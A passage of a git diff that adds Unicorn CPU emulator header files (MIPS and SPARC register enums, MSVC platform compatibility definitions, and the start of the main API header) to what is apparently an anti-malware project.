UC_MIPS_REG_F10, + UC_MIPS_REG_F11, + UC_MIPS_REG_F12, + UC_MIPS_REG_F13, + UC_MIPS_REG_F14, + UC_MIPS_REG_F15, + UC_MIPS_REG_F16, + UC_MIPS_REG_F17, + UC_MIPS_REG_F18, + UC_MIPS_REG_F19, + UC_MIPS_REG_F20, + UC_MIPS_REG_F21, + UC_MIPS_REG_F22, + UC_MIPS_REG_F23, + UC_MIPS_REG_F24, + UC_MIPS_REG_F25, + UC_MIPS_REG_F26, + UC_MIPS_REG_F27, + UC_MIPS_REG_F28, + UC_MIPS_REG_F29, + UC_MIPS_REG_F30, + UC_MIPS_REG_F31, + + UC_MIPS_REG_FCC0, + UC_MIPS_REG_FCC1, + UC_MIPS_REG_FCC2, + UC_MIPS_REG_FCC3, + UC_MIPS_REG_FCC4, + UC_MIPS_REG_FCC5, + UC_MIPS_REG_FCC6, + UC_MIPS_REG_FCC7, + + //> AFPR128 + UC_MIPS_REG_W0, + UC_MIPS_REG_W1, + UC_MIPS_REG_W2, + UC_MIPS_REG_W3, + UC_MIPS_REG_W4, + UC_MIPS_REG_W5, + UC_MIPS_REG_W6, + UC_MIPS_REG_W7, + UC_MIPS_REG_W8, + UC_MIPS_REG_W9, + UC_MIPS_REG_W10, + UC_MIPS_REG_W11, + UC_MIPS_REG_W12, + UC_MIPS_REG_W13, + UC_MIPS_REG_W14, + UC_MIPS_REG_W15, + UC_MIPS_REG_W16, + UC_MIPS_REG_W17, + UC_MIPS_REG_W18, + UC_MIPS_REG_W19, + UC_MIPS_REG_W20, + UC_MIPS_REG_W21, + UC_MIPS_REG_W22, + UC_MIPS_REG_W23, + UC_MIPS_REG_W24, + UC_MIPS_REG_W25, + UC_MIPS_REG_W26, + UC_MIPS_REG_W27, + UC_MIPS_REG_W28, + UC_MIPS_REG_W29, + UC_MIPS_REG_W30, + UC_MIPS_REG_W31, + + UC_MIPS_REG_HI, + UC_MIPS_REG_LO, + + UC_MIPS_REG_P0, + UC_MIPS_REG_P1, + UC_MIPS_REG_P2, + + UC_MIPS_REG_MPL0, + UC_MIPS_REG_MPL1, + UC_MIPS_REG_MPL2, + + UC_MIPS_REG_CP0_CONFIG3, + UC_MIPS_REG_CP0_USERLOCAL, + + UC_MIPS_REG_ENDING, // <-- mark the end of the list or registers + + // alias registers + UC_MIPS_REG_ZERO = UC_MIPS_REG_0, + UC_MIPS_REG_AT = UC_MIPS_REG_1, + UC_MIPS_REG_V0 = UC_MIPS_REG_2, + UC_MIPS_REG_V1 = UC_MIPS_REG_3, + UC_MIPS_REG_A0 = UC_MIPS_REG_4, + UC_MIPS_REG_A1 = UC_MIPS_REG_5, + UC_MIPS_REG_A2 = UC_MIPS_REG_6, + UC_MIPS_REG_A3 = UC_MIPS_REG_7, + UC_MIPS_REG_T0 = UC_MIPS_REG_8, + UC_MIPS_REG_T1 = UC_MIPS_REG_9, + UC_MIPS_REG_T2 = UC_MIPS_REG_10, + UC_MIPS_REG_T3 = UC_MIPS_REG_11, + UC_MIPS_REG_T4 = UC_MIPS_REG_12, + UC_MIPS_REG_T5 = UC_MIPS_REG_13, + UC_MIPS_REG_T6 = UC_MIPS_REG_14, + UC_MIPS_REG_T7 = UC_MIPS_REG_15, + UC_MIPS_REG_S0 = UC_MIPS_REG_16, + UC_MIPS_REG_S1 = UC_MIPS_REG_17, + UC_MIPS_REG_S2 = UC_MIPS_REG_18, + UC_MIPS_REG_S3 = UC_MIPS_REG_19, + UC_MIPS_REG_S4 = UC_MIPS_REG_20, + UC_MIPS_REG_S5 = UC_MIPS_REG_21, + UC_MIPS_REG_S6 = UC_MIPS_REG_22, + UC_MIPS_REG_S7 = UC_MIPS_REG_23, + UC_MIPS_REG_T8 = UC_MIPS_REG_24, + UC_MIPS_REG_T9 = UC_MIPS_REG_25, + UC_MIPS_REG_K0 = UC_MIPS_REG_26, + UC_MIPS_REG_K1 = UC_MIPS_REG_27, + UC_MIPS_REG_GP = UC_MIPS_REG_28, + UC_MIPS_REG_SP = UC_MIPS_REG_29, + UC_MIPS_REG_FP = UC_MIPS_REG_30, UC_MIPS_REG_S8 = UC_MIPS_REG_30, + UC_MIPS_REG_RA = UC_MIPS_REG_31, + + UC_MIPS_REG_HI0 = UC_MIPS_REG_AC0, + UC_MIPS_REG_HI1 = UC_MIPS_REG_AC1, + UC_MIPS_REG_HI2 = UC_MIPS_REG_AC2, + UC_MIPS_REG_HI3 = UC_MIPS_REG_AC3, + + UC_MIPS_REG_LO0 = UC_MIPS_REG_HI0, + UC_MIPS_REG_LO1 = UC_MIPS_REG_HI1, + UC_MIPS_REG_LO2 = UC_MIPS_REG_HI2, + UC_MIPS_REG_LO3 = UC_MIPS_REG_HI3, +} UC_MIPS_REG; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/include/unicorn/platform.h b/ai_anti_malware/unicorn/include/unicorn/platform.h new file mode 100644 index 0000000..5bbfd8a --- /dev/null +++ b/ai_anti_malware/unicorn/include/unicorn/platform.h @@ -0,0 +1,221 @@ +/* This file is released under LGPL2. + See COPYING.LGPL2 in root directory for more details +*/ + +/* + This file is to support header files that are missing in MSVC and + other non-standard compilers. +*/ +#ifndef UNICORN_PLATFORM_H +#define UNICORN_PLATFORM_H + +/* +These are the various MSVC versions as given by _MSC_VER: +MSVC++ 14.0 _MSC_VER == 1900 (Visual Studio 2015) +MSVC++ 12.0 _MSC_VER == 1800 (Visual Studio 2013) +MSVC++ 11.0 _MSC_VER == 1700 (Visual Studio 2012) +MSVC++ 10.0 _MSC_VER == 1600 (Visual Studio 2010) +MSVC++ 9.0 _MSC_VER == 1500 (Visual Studio 2008) +MSVC++ 8.0 _MSC_VER == 1400 (Visual Studio 2005) +MSVC++ 7.1 _MSC_VER == 1310 (Visual Studio 2003) +MSVC++ 7.0 _MSC_VER == 1300 +MSVC++ 6.0 _MSC_VER == 1200 +MSVC++ 5.0 _MSC_VER == 1100 +*/ +#define MSC_VER_VS2003 1310 +#define MSC_VER_VS2005 1400 +#define MSC_VER_VS2008 1500 +#define MSC_VER_VS2010 1600 +#define MSC_VER_VS2012 1700 +#define MSC_VER_VS2013 1800 +#define MSC_VER_VS2015 1900 + +// handle stdbool.h compatibility +#if !defined(__CYGWIN__) && !defined(__MINGW32__) && !defined(__MINGW64__) && (defined (WIN32) || defined (WIN64) || defined (_WIN32) || defined (_WIN64)) +// MSVC + +// stdbool.h +#if (_MSC_VER < MSC_VER_VS2013) || defined(_KERNEL_MODE) +// this system does not have stdbool.h +#ifndef __cplusplus +typedef unsigned char bool; +#define false 0 +#define true 1 +#endif // __cplusplus + +#else +// VisualStudio 2013+ -> C99 is supported +#include +#endif // (_MSC_VER < MSC_VER_VS2013) || defined(_KERNEL_MODE) + +#else +// not MSVC -> C99 is supported +#include +#endif // !defined(__CYGWIN__) && !defined(__MINGW32__) && !defined(__MINGW64__) && (defined (WIN32) || defined (WIN64) || defined (_WIN32) || defined (_WIN64)) + +#if (defined(_MSC_VER) && (_MSC_VER < MSC_VER_VS2010)) || defined(_KERNEL_MODE) +// this system does not have stdint.h +typedef signed char int8_t; +typedef signed short int16_t; +typedef signed int int32_t; +typedef unsigned char uint8_t; +typedef unsigned short uint16_t; +typedef unsigned int uint32_t; +typedef signed long long int64_t; +typedef unsigned long long uint64_t; + +#ifndef _INTPTR_T_DEFINED + #define _INTPTR_T_DEFINED + #ifdef _WIN64 +typedef long long intptr_t; + #else /* _WIN64 */ +typedef _W64 int intptr_t; + #endif /* _WIN64 */ +#endif /* _INTPTR_T_DEFINED */ + +#ifndef _UINTPTR_T_DEFINED + #define _UINTPTR_T_DEFINED + #ifdef _WIN64 +typedef unsigned long long uintptr_t; + #else /* _WIN64 */ +typedef _W64 unsigned int uintptr_t; + #endif /* _WIN64 */ +#endif /* _UINTPTR_T_DEFINED */ + +#define INT8_MIN (-127i8 - 1) +#define INT16_MIN (-32767i16 - 1) +#define INT32_MIN (-2147483647i32 - 1) +#define INT64_MIN (-9223372036854775807i64 - 1) +#define INT8_MAX 127i8 +#define INT16_MAX 32767i16 +#define INT32_MAX 2147483647i32 +#define INT64_MAX 9223372036854775807i64 +#define UINT8_MAX 0xffui8 +#define UINT16_MAX 0xffffui16 +#define UINT32_MAX 0xffffffffui32 +#define UINT64_MAX 0xffffffffffffffffui64 +#else // this system has stdint.h +#include +#endif // (defined(_MSC_VER) && (_MSC_VER < MSC_VER_VS2010)) || defined(_KERNEL_MODE) + +// handle inttypes.h compatibility +#if (defined(_MSC_VER) && (_MSC_VER < MSC_VER_VS2013)) || defined(_KERNEL_MODE) +// this system does not have inttypes.h + +#define __PRI_8_LENGTH_MODIFIER__ "hh" +#define __PRI_64_LENGTH_MODIFIER__ "ll" + +#define PRId8 __PRI_8_LENGTH_MODIFIER__ "d" +#define PRIi8 __PRI_8_LENGTH_MODIFIER__ "i" +#define PRIo8 __PRI_8_LENGTH_MODIFIER__ "o" +#define PRIu8 __PRI_8_LENGTH_MODIFIER__ "u" +#define PRIx8 __PRI_8_LENGTH_MODIFIER__ "x" +#define PRIX8 __PRI_8_LENGTH_MODIFIER__ "X" + +#define PRId16 "hd" +#define PRIi16 "hi" +#define PRIo16 "ho" +#define PRIu16 "hu" +#define PRIx16 "hx" +#define PRIX16 "hX" + +#if defined(_MSC_VER) && (_MSC_VER <= MSC_VER_VS2012) +#define PRId32 "ld" +#define PRIi32 "li" +#define PRIo32 "lo" +#define PRIu32 "lu" +#define PRIx32 "lx" +#define PRIX32 "lX" +#else // OSX +#define PRId32 "d" +#define PRIi32 "i" +#define PRIo32 "o" +#define PRIu32 "u" +#define PRIx32 "x" +#define PRIX32 "X" +#endif // defined(_MSC_VER) && (_MSC_VER <= MSC_VER_VS2012) + +#if defined(_MSC_VER) && (_MSC_VER <= MSC_VER_VS2012) +// redefine functions from inttypes.h used in cstool +#define strtoull _strtoui64 +#endif + +#define PRId64 __PRI_64_LENGTH_MODIFIER__ "d" +#define PRIi64 __PRI_64_LENGTH_MODIFIER__ "i" +#define PRIo64 __PRI_64_LENGTH_MODIFIER__ "o" +#define PRIu64 __PRI_64_LENGTH_MODIFIER__ "u" +#define PRIx64 __PRI_64_LENGTH_MODIFIER__ "x" +#define PRIX64 __PRI_64_LENGTH_MODIFIER__ "X" + +#else +// this system has inttypes.h by default +#include +#endif // #if defined(_MSC_VER) && (_MSC_VER < MSC_VER_VS2013) || defined(_KERNEL_MODE) + +// sys/time.h compatibility +#if defined(_MSC_VER) +#include +#include +#include + +static int gettimeofday(struct timeval* t, void* timezone) +{ + struct _timeb timebuffer; + _ftime( &timebuffer ); + t->tv_sec = (long)timebuffer.time; + t->tv_usec = 1000*timebuffer.millitm; + return 0; +} +#else +#include +#endif + +// unistd.h compatibility +#if defined(_MSC_VER) + +static int usleep(uint32_t usec) +{ + HANDLE timer; + LARGE_INTEGER due; + + timer = CreateWaitableTimer(NULL, TRUE, NULL); + if (!timer) + return -1; + + due.QuadPart = (-((int64_t) usec)) * 10LL; + if (!SetWaitableTimer(timer, &due, 0, NULL, NULL, 0)) { + CloseHandle(timer); + return -1; + } + WaitForSingleObject(timer, INFINITE); + CloseHandle(timer); + + return 0; +} + +#else +#include +#endif + +// misc support +#if defined(_MSC_VER) +#ifdef _WIN64 +typedef signed __int64 ssize_t; +#else +typedef _W64 signed int ssize_t; +#endif + +#ifndef va_copy +#define va_copy(d,s) ((d) = (s)) +#endif +#define strcasecmp _stricmp +#if (_MSC_VER < MSC_VER_VS2015) +#define snprintf _snprintf +#endif +#if (_MSC_VER <= MSC_VER_VS2013) +#define strtoll _strtoi64 +#endif +#endif + + +#endif // UNICORN_PLATFORM_H diff --git a/ai_anti_malware/unicorn/include/unicorn/sparc.h b/ai_anti_malware/unicorn/include/unicorn/sparc.h new file mode 100644 index 0000000..08e0538 --- /dev/null +++ b/ai_anti_malware/unicorn/include/unicorn/sparc.h @@ -0,0 +1,130 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2014-2017 */ +/* This file is released under LGPL2. + See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_SPARC_H +#define UNICORN_SPARC_H + +#ifdef __cplusplus +extern "C" { +#endif + +// GCC SPARC toolchain has a default macro called "sparc" which breaks +// compilation +#undef sparc + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +//> SPARC registers +typedef enum uc_sparc_reg { + UC_SPARC_REG_INVALID = 0, + + UC_SPARC_REG_F0, + UC_SPARC_REG_F1, + UC_SPARC_REG_F2, + UC_SPARC_REG_F3, + UC_SPARC_REG_F4, + UC_SPARC_REG_F5, + UC_SPARC_REG_F6, + UC_SPARC_REG_F7, + UC_SPARC_REG_F8, + UC_SPARC_REG_F9, + UC_SPARC_REG_F10, + UC_SPARC_REG_F11, + UC_SPARC_REG_F12, + UC_SPARC_REG_F13, + UC_SPARC_REG_F14, + UC_SPARC_REG_F15, + UC_SPARC_REG_F16, + UC_SPARC_REG_F17, + UC_SPARC_REG_F18, + UC_SPARC_REG_F19, + UC_SPARC_REG_F20, + UC_SPARC_REG_F21, + UC_SPARC_REG_F22, + UC_SPARC_REG_F23, + UC_SPARC_REG_F24, + UC_SPARC_REG_F25, + UC_SPARC_REG_F26, + UC_SPARC_REG_F27, + UC_SPARC_REG_F28, + UC_SPARC_REG_F29, + UC_SPARC_REG_F30, + UC_SPARC_REG_F31, + UC_SPARC_REG_F32, + UC_SPARC_REG_F34, + UC_SPARC_REG_F36, + UC_SPARC_REG_F38, + UC_SPARC_REG_F40, + UC_SPARC_REG_F42, + UC_SPARC_REG_F44, + UC_SPARC_REG_F46, + UC_SPARC_REG_F48, + UC_SPARC_REG_F50, + UC_SPARC_REG_F52, + UC_SPARC_REG_F54, + UC_SPARC_REG_F56, + UC_SPARC_REG_F58, + UC_SPARC_REG_F60, + UC_SPARC_REG_F62, + UC_SPARC_REG_FCC0, // Floating condition codes + UC_SPARC_REG_FCC1, + UC_SPARC_REG_FCC2, + UC_SPARC_REG_FCC3, + UC_SPARC_REG_G0, + UC_SPARC_REG_G1, + UC_SPARC_REG_G2, + UC_SPARC_REG_G3, + UC_SPARC_REG_G4, + UC_SPARC_REG_G5, + UC_SPARC_REG_G6, + UC_SPARC_REG_G7, + UC_SPARC_REG_I0, + UC_SPARC_REG_I1, + UC_SPARC_REG_I2, + UC_SPARC_REG_I3, + UC_SPARC_REG_I4, + UC_SPARC_REG_I5, + UC_SPARC_REG_FP, + UC_SPARC_REG_I7, + UC_SPARC_REG_ICC, // Integer condition codes + UC_SPARC_REG_L0, + UC_SPARC_REG_L1, + UC_SPARC_REG_L2, + UC_SPARC_REG_L3, + UC_SPARC_REG_L4, + UC_SPARC_REG_L5, + UC_SPARC_REG_L6, + UC_SPARC_REG_L7, + UC_SPARC_REG_O0, + UC_SPARC_REG_O1, + UC_SPARC_REG_O2, + UC_SPARC_REG_O3, + UC_SPARC_REG_O4, + UC_SPARC_REG_O5, + UC_SPARC_REG_SP, + UC_SPARC_REG_O7, + UC_SPARC_REG_Y, + + // special register + UC_SPARC_REG_XCC, + + // pseudo register + UC_SPARC_REG_PC, // program counter register + + UC_SPARC_REG_ENDING, // <-- mark the end of the list of registers + + // extras + UC_SPARC_REG_O6 = UC_SPARC_REG_SP, + UC_SPARC_REG_I6 = UC_SPARC_REG_FP, +} uc_sparc_reg; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/include/unicorn/unicorn.h b/ai_anti_malware/unicorn/include/unicorn/unicorn.h new file mode 100644 index 0000000..ab5485e --- /dev/null +++ b/ai_anti_malware/unicorn/include/unicorn/unicorn.h @@ -0,0 +1,779 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015-2017 */ +/* This file is released under LGPL2. + See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_ENGINE_H +#define UNICORN_ENGINE_H + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" +#include + +#if defined(UNICORN_HAS_OSXKERNEL) +#include +#else +#include +#include +#endif + +struct uc_struct; +typedef struct uc_struct uc_engine; + +typedef size_t uc_hook; + +#include "m68k.h" +#include "x86.h" +#include "arm.h" +#include "arm64.h" +#include "mips.h" +#include "sparc.h" + +#ifdef __GNUC__ +#define DEFAULT_VISIBILITY __attribute__((visibility("default"))) +#else +#define DEFAULT_VISIBILITY +#endif + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#pragma warning(disable:4100) +#ifdef UNICORN_SHARED +#define UNICORN_EXPORT __declspec(dllexport) +#else // defined(UNICORN_STATIC) +#define UNICORN_EXPORT +#endif +#else +#ifdef __GNUC__ +#define UNICORN_EXPORT __attribute__((visibility("default"))) +#else +#define UNICORN_EXPORT +#endif +#endif + +#ifdef __GNUC__ +#define UNICORN_DEPRECATED __attribute__((deprecated)) +#elif defined(_MSC_VER) +#define UNICORN_DEPRECATED __declspec(deprecated) +#else +#pragma message("WARNING: You need to implement UNICORN_DEPRECATED for this compiler") +#define UNICORN_DEPRECATED +#endif + +// Unicorn API version +#define UC_API_MAJOR 1 +#define UC_API_MINOR 0 + +// Unicorn package version +#define UC_VERSION_MAJOR UC_API_MAJOR +#define UC_VERSION_MINOR UC_API_MINOR +#define UC_VERSION_EXTRA 2 + + +/* + Macro to create combined version which can be compared to + result of uc_version() API. +*/ +#define UC_MAKE_VERSION(major, minor) ((major << 8) + minor) + +// Scales to calculate timeout on microsecond unit +// 1 second = 1000,000 microseconds +#define UC_SECOND_SCALE 1000000 +// 1 milisecond = 1000 nanoseconds +#define UC_MILISECOND_SCALE 1000 + +// Architecture type +typedef enum uc_arch { + UC_ARCH_ARM = 1, // ARM architecture (including Thumb, Thumb-2) + UC_ARCH_ARM64, // ARM-64, also called AArch64 + UC_ARCH_MIPS, // Mips architecture + UC_ARCH_X86, // X86 architecture (including x86 & x86-64) + UC_ARCH_PPC, // PowerPC architecture (currently unsupported) + UC_ARCH_SPARC, // Sparc architecture + UC_ARCH_M68K, // M68K architecture + UC_ARCH_MAX, +} uc_arch; + +// Mode type +typedef enum uc_mode { + UC_MODE_LITTLE_ENDIAN = 0, // little-endian mode (default mode) + UC_MODE_BIG_ENDIAN = 1 << 30, // big-endian mode + + // arm / arm64 + UC_MODE_ARM = 0, // ARM mode + UC_MODE_THUMB = 1 << 4, // THUMB mode (including Thumb-2) + UC_MODE_MCLASS = 1 << 5, // ARM's Cortex-M series (currently unsupported) + UC_MODE_V8 = 1 << 6, // ARMv8 A32 encodings for ARM (currently unsupported) + + // arm (32bit) cpu types + UC_MODE_ARM926 = 1 << 7, // ARM926 CPU type + UC_MODE_ARM946 = 1 << 8, // ARM946 CPU type + UC_MODE_ARM1176 = 1 << 9, // ARM1176 CPU type + + // mips + UC_MODE_MICRO = 1 << 4, // MicroMips mode (currently unsupported) + UC_MODE_MIPS3 = 1 << 5, // Mips III ISA (currently unsupported) + UC_MODE_MIPS32R6 = 1 << 6, // Mips32r6 ISA (currently unsupported) + UC_MODE_MIPS32 = 1 << 2, // Mips32 ISA + UC_MODE_MIPS64 = 1 << 3, // Mips64 ISA + + // x86 / x64 + UC_MODE_16 = 1 << 1, // 16-bit mode + UC_MODE_32 = 1 << 2, // 32-bit mode + UC_MODE_64 = 1 << 3, // 64-bit mode + + // ppc + UC_MODE_PPC32 = 1 << 2, // 32-bit mode (currently unsupported) + UC_MODE_PPC64 = 1 << 3, // 64-bit mode (currently unsupported) + UC_MODE_QPX = 1 << 4, // Quad Processing eXtensions mode (currently unsupported) + + // sparc + UC_MODE_SPARC32 = 1 << 2, // 32-bit mode + UC_MODE_SPARC64 = 1 << 3, // 64-bit mode + UC_MODE_V9 = 1 << 4, // SparcV9 mode (currently unsupported) + + // m68k +} uc_mode; + +// All type of errors encountered by Unicorn API. +// These are values returned by uc_errno() +typedef enum uc_err { + UC_ERR_OK = 0, // No error: everything was fine + UC_ERR_NOMEM, // Out-Of-Memory error: uc_open(), uc_emulate() + UC_ERR_ARCH, // Unsupported architecture: uc_open() + UC_ERR_HANDLE, // Invalid handle + UC_ERR_MODE, // Invalid/unsupported mode: uc_open() + UC_ERR_VERSION, // Unsupported version (bindings) + UC_ERR_READ_UNMAPPED, // Quit emulation due to READ on unmapped memory: uc_emu_start() + UC_ERR_WRITE_UNMAPPED, // Quit emulation due to WRITE on unmapped memory: uc_emu_start() + UC_ERR_FETCH_UNMAPPED, // Quit emulation due to FETCH on unmapped memory: uc_emu_start() + UC_ERR_HOOK, // Invalid hook type: uc_hook_add() + UC_ERR_INSN_INVALID, // Quit emulation due to invalid instruction: uc_emu_start() + UC_ERR_MAP, // Invalid memory mapping: uc_mem_map() + UC_ERR_WRITE_PROT, // Quit emulation due to UC_MEM_WRITE_PROT violation: uc_emu_start() + UC_ERR_READ_PROT, // Quit emulation due to UC_MEM_READ_PROT violation: uc_emu_start() + UC_ERR_FETCH_PROT, // Quit emulation due to UC_MEM_FETCH_PROT violation: uc_emu_start() + UC_ERR_ARG, // Inavalid argument provided to uc_xxx function (See specific function API) + UC_ERR_READ_UNALIGNED, // Unaligned read + UC_ERR_WRITE_UNALIGNED, // Unaligned write + UC_ERR_FETCH_UNALIGNED, // Unaligned fetch + UC_ERR_HOOK_EXIST, // hook for this event already existed + UC_ERR_RESOURCE, // Insufficient resource: uc_emu_start() + UC_ERR_EXCEPTION, // Unhandled CPU exception +} uc_err; + + +/* + Callback function for tracing code (UC_HOOK_CODE & UC_HOOK_BLOCK) + + @address: address where the code is being executed + @size: size of machine instruction(s) being executed, or 0 when size is unknown + @user_data: user data passed to tracing APIs. +*/ +typedef void (*uc_cb_hookcode_t)(uc_engine *uc, uint64_t address, uint32_t size, void *user_data); + +/* + Callback function for tracing interrupts (for uc_hook_intr()) + + @intno: interrupt number + @user_data: user data passed to tracing APIs. +*/ +typedef void (*uc_cb_hookintr_t)(uc_engine *uc, uint32_t intno, void *user_data); + +/* + Callback function for tracing invalid instructions + + @user_data: user data passed to tracing APIs. + + @return: return true to continue, or false to stop program (due to invalid instruction). +*/ +typedef bool (*uc_cb_hookinsn_invalid_t)(uc_engine *uc, void *user_data); + +/* + Callback function for tracing IN instruction of X86 + + @port: port number + @size: data size (1/2/4) to be read from this port + @user_data: user data passed to tracing APIs. +*/ +typedef uint32_t (*uc_cb_insn_in_t)(uc_engine *uc, uint32_t port, int size, void *user_data); + +/* + Callback function for OUT instruction of X86 + + @port: port number + @size: data size (1/2/4) to be written to this port + @value: data value to be written to this port +*/ +typedef void (*uc_cb_insn_out_t)(uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data); + +// All type of memory accesses for UC_HOOK_MEM_* +typedef enum uc_mem_type { + UC_MEM_READ = 16, // Memory is read from + UC_MEM_WRITE, // Memory is written to + UC_MEM_FETCH, // Memory is fetched + UC_MEM_READ_UNMAPPED, // Unmapped memory is read from + UC_MEM_WRITE_UNMAPPED, // Unmapped memory is written to + UC_MEM_FETCH_UNMAPPED, // Unmapped memory is fetched + UC_MEM_WRITE_PROT, // Write to write protected, but mapped, memory + UC_MEM_READ_PROT, // Read from read protected, but mapped, memory + UC_MEM_FETCH_PROT, // Fetch from non-executable, but mapped, memory + UC_MEM_READ_AFTER, // Memory is read from (successful access) +} uc_mem_type; + +// All type of hooks for uc_hook_add() API. +typedef enum uc_hook_type { + // Hook all interrupt/syscall events + UC_HOOK_INTR = 1 << 0, + // Hook a particular instruction - only a very small subset of instructions supported here + UC_HOOK_INSN = 1 << 1, + // Hook a range of code + UC_HOOK_CODE = 1 << 2, + // Hook basic blocks + UC_HOOK_BLOCK = 1 << 3, + // Hook for memory read on unmapped memory + UC_HOOK_MEM_READ_UNMAPPED = 1 << 4, + // Hook for invalid memory write events + UC_HOOK_MEM_WRITE_UNMAPPED = 1 << 5, + // Hook for invalid memory fetch for execution events + UC_HOOK_MEM_FETCH_UNMAPPED = 1 << 6, + // Hook for memory read on read-protected memory + UC_HOOK_MEM_READ_PROT = 1 << 7, + // Hook for memory write on write-protected memory + UC_HOOK_MEM_WRITE_PROT = 1 << 8, + // Hook for memory fetch on non-executable memory + UC_HOOK_MEM_FETCH_PROT = 1 << 9, + // Hook memory read events. + UC_HOOK_MEM_READ = 1 << 10, + // Hook memory write events. + UC_HOOK_MEM_WRITE = 1 << 11, + // Hook memory fetch for execution events + UC_HOOK_MEM_FETCH = 1 << 12, + // Hook memory read events, but only successful access. + // The callback will be triggered after successful read. + UC_HOOK_MEM_READ_AFTER = 1 << 13, + // Hook invalid instructions exceptions. + UC_HOOK_INSN_INVALID = 1 << 14, +} uc_hook_type; + +// Hook type for all events of unmapped memory access +#define UC_HOOK_MEM_UNMAPPED (UC_HOOK_MEM_READ_UNMAPPED + UC_HOOK_MEM_WRITE_UNMAPPED + UC_HOOK_MEM_FETCH_UNMAPPED) +// Hook type for all events of illegal protected memory access +#define UC_HOOK_MEM_PROT (UC_HOOK_MEM_READ_PROT + UC_HOOK_MEM_WRITE_PROT + UC_HOOK_MEM_FETCH_PROT) +// Hook type for all events of illegal read memory access +#define UC_HOOK_MEM_READ_INVALID (UC_HOOK_MEM_READ_PROT + UC_HOOK_MEM_READ_UNMAPPED) +// Hook type for all events of illegal write memory access +#define UC_HOOK_MEM_WRITE_INVALID (UC_HOOK_MEM_WRITE_PROT + UC_HOOK_MEM_WRITE_UNMAPPED) +// Hook type for all events of illegal fetch memory access +#define UC_HOOK_MEM_FETCH_INVALID (UC_HOOK_MEM_FETCH_PROT + UC_HOOK_MEM_FETCH_UNMAPPED) +// Hook type for all events of illegal memory access +#define UC_HOOK_MEM_INVALID (UC_HOOK_MEM_UNMAPPED + UC_HOOK_MEM_PROT) +// Hook type for all events of valid memory access +// NOTE: UC_HOOK_MEM_READ is triggered before UC_HOOK_MEM_READ_PROT and UC_HOOK_MEM_READ_UNMAPPED, so +// this hook may technically trigger on some invalid reads. +#define UC_HOOK_MEM_VALID (UC_HOOK_MEM_READ + UC_HOOK_MEM_WRITE + UC_HOOK_MEM_FETCH) + +/* + Callback function for hooking memory (READ, WRITE & FETCH) + + @type: this memory is being READ, or WRITE + @address: address where the code is being executed + @size: size of data being read or written + @value: value of data being written to memory, or irrelevant if type = READ. + @user_data: user data passed to tracing APIs +*/ +typedef void (*uc_cb_hookmem_t)(uc_engine *uc, uc_mem_type type, + uint64_t address, int size, int64_t value, void *user_data); + +/* + Callback function for handling invalid memory access events (UNMAPPED and + PROT events) + + @type: this memory is being READ, or WRITE + @address: address where the code is being executed + @size: size of data being read or written + @value: value of data being written to memory, or irrelevant if type = READ. + @user_data: user data passed to tracing APIs + + @return: return true to continue, or false to stop program (due to invalid memory). + NOTE: returning true to continue execution will only work if if the accessed + memory is made accessible with the correct permissions during the hook. + + In the event of a UC_MEM_READ_UNMAPPED or UC_MEM_WRITE_UNMAPPED callback, + the memory should be uc_mem_map()-ed with the correct permissions, and the + instruction will then read or write to the address as it was supposed to. + + In the event of a UC_MEM_FETCH_UNMAPPED callback, the memory can be mapped + in as executable, in which case execution will resume from the fetched address. + The instruction pointer may be written to in order to change where execution resumes, + but the fetch must succeed if execution is to resume. +*/ +typedef bool (*uc_cb_eventmem_t)(uc_engine *uc, uc_mem_type type, + uint64_t address, int size, int64_t value, void *user_data); + +/* + Memory region mapped by uc_mem_map() and uc_mem_map_ptr() + Retrieve the list of memory regions with uc_mem_regions() +*/ +typedef struct uc_mem_region { + uint64_t begin; // begin address of the region (inclusive) + uint64_t end; // end address of the region (inclusive) + uint32_t perms; // memory permissions of the region +} uc_mem_region; + +// All type of queries for uc_query() API. +typedef enum uc_query_type { + // Dynamically query current hardware mode. + UC_QUERY_MODE = 1, + UC_QUERY_PAGE_SIZE, // query pagesize of engine + UC_QUERY_ARCH, // query architecture of engine (for ARM to query Thumb mode) + UC_QUERY_TIMEOUT, // query if emulation stops due to timeout (indicated if result = True) +} uc_query_type; + +// Opaque storage for CPU context, used with uc_context_*() +struct uc_context; +typedef struct uc_context uc_context; + +/* + Return combined API version & major and minor version numbers. + + @major: major number of API version + @minor: minor number of API version + + @return hexical number as (major << 8 | minor), which encodes both + major & minor versions. + NOTE: This returned value can be compared with version number made + with macro UC_MAKE_VERSION + + For example, second API version would return 1 in @major, and 1 in @minor + The return value would be 0x0101 + + NOTE: if you only care about returned value, but not major and minor values, + set both @major & @minor arguments to NULL. +*/ +UNICORN_EXPORT +unsigned int uc_version(unsigned int *major, unsigned int *minor); + + +/* + Determine if the given architecture is supported by this library. + + @arch: architecture type (UC_ARCH_*) + + @return True if this library supports the given arch. +*/ +UNICORN_EXPORT +bool uc_arch_supported(uc_arch arch); + + +/* + Create new instance of unicorn engine. + + @arch: architecture type (UC_ARCH_*) + @mode: hardware mode. This is combined of UC_MODE_* + @uc: pointer to uc_engine, which will be updated at return time + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_open(uc_arch arch, uc_mode mode, uc_engine **uc); + +/* + Close a Unicorn engine instance. + NOTE: this must be called only when there is no longer any + usage of @uc. This API releases some of @uc's cached memory, thus + any use of the Unicorn API with @uc after it has been closed may + crash your application. After this, @uc is invalid, and is no + longer usable. + + @uc: pointer to a handle returned by uc_open() + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_close(uc_engine *uc); + +/* + Query internal status of engine. + + @uc: handle returned by uc_open() + @type: query type. See uc_query_type + + @result: save the internal status queried + + @return: error code of uc_err enum type (UC_ERR_*, see above) +*/ +UNICORN_EXPORT +uc_err uc_query(uc_engine *uc, uc_query_type type, size_t *result); + +/* + Report the last error number when some API function fail. + Like glibc's errno, uc_errno might not retain its old value once 